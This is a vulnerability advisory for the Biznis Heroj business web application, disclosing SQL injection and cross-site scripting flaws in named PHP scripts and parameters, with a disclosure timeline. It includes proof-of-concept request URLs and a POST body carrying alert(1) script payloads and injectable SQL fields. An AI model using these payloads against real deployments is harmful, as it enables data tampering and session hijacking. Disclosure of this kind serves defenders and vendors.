Infoproject Biznis Heroj Cross Site Scripting / SQL Injection

Risk: Medium
Local: No
Remote: Yes

Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities Vendor: Infoproject DOO Product web page: Affected version: Plus, Pro and Extra Summary: Biznis Heroj or Business Hero (èèñ Õåð¼) is the first software on the Macedonian market that will help you manage your business processes in your company, such as accounting, production, acquisition, archiving, inventory, and the Cloud. Using the Cloud technology, Biznis Heroj allows you to access the system from any computer at any time through any internet browser. Desc: Input passed via the parameters 'filter' in 'widget.dokumenti_lista.php' and 'fin_nalog_id' in 'nalozi_naslov.php' script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param 'config' in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache, PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Vendor status: [14.12.2011] Vulnerability discovered. [15.12.2011] Contact with the vendor. [20.12.2011] No response from the vendor. [21.12.2011] Public security advisory released. Advisory ID: ZSL-2011-5064 Advisory URL: 14.12.2011 --- XSS: https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1); https://[TARGET]/widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1 SQLi: - POST https://[TARGET]/widgets/widget.dokumenti_lista.php action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen& bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1& magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML& dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML& dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML& dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA& order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc & filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=& limit=50&widget=1 - GET https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default


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